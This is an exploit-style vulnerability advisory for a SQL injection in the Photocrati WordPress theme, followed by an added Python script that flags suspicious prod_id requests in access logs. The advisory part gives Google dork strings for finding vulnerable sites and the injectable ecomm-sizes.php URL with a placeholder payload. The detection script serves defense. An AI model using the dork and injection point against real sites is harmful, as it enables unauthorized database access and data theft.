# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
--------
details |
=======================================================
Software : photocrati
version :4.X.X
Risk : High
remote : yes
An attacker can perform a remote SQL injection through the site URL to obtain sensitive information.
Almost all versions are affected by this vulnerability.
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
greetz to all muslims and all tryag members
:) from morocco
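
A defender-side check for the request pattern in this advisory, as an added example that is not part of the original advisory: it scans web-server access logs for requests to ecomm-sizes.php whose prod_id is not a plain integer. The combined log format, the premise that legitimate prod_id values are numeric, and the sample lines with their theme directory name are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script name and parameter are taken from the advisory; the theme directory
# differs per site, so any single directory under /themes/ is accepted.
TARGET = re.compile(r"/wp-content/themes/[^/]+/ecomm-sizes\.php$", re.I)
# Combined log format (assumed): client IP first, request line in quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate prod_id is a short decimal product number.
NUMERIC_ID = re.compile(r"\d{1,10}")

def suspicious_prod_id(uri):
    """Return the decoded prod_id when it is not a plain integer, else None."""
    parts = urlsplit(uri)
    if not TARGET.search(unquote(parts.path)):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("prod_id", [])
    for value in values:  # repeated parameters are all checked
        if not NUMERIC_ID.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_prod_id) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST.match(line)
        if match is None:
            continue  # not a request line in the expected format
        value = suspicious_prod_id(match.group(2))
        if value is not None:
            hits.append((match.group(1), value))
    return hits

# Constructed sample lines (documentation IP ranges, made-up theme directory).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/themes/'
    'photocrati-theme/ecomm-sizes.php?prod_id=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/themes/'
    'photocrati-theme/ecomm-sizes.php?prod_id=12%27 HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?prod_id=abc'
    ' HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-numeric prod_id={value!r} to ecomm-sizes.php")
```

The same integer-only rule can be enforced in front of the site as a request filter until the theme is updated or the script is removed.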